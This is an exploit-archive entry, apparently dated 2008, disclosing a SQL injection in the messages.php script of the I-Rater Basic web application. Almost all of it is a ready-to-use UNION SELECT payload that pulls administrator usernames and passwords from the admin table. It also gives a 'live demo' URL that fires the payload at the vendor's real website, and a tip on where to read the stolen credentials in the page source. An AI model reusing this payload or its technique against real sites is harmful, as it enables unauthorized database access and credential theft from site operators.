id: 4496
date: 12/18/2008
title: I-Rater Basic (messages.php) Remote SQL Injection Vulnerability
author: boom3rang
cves: 

===============================================================
I-Rater Basic (messages.php) Remote SQL Injection Vulnerability
===============================================================


#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################

###################################################
#[~] Author :  boom3rang 
#[!] Script Name: I-Rater Basic
#[!] Home Page:  http://www.i-rater.com
#[!] Google_Dork:  N/A
###################################################





#[~] Example:  
http://localhost/Path/messages.php?idp=[exploit]

#[~]Exploit:  
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).

##############################



#  0day.today [2023-03-27]  #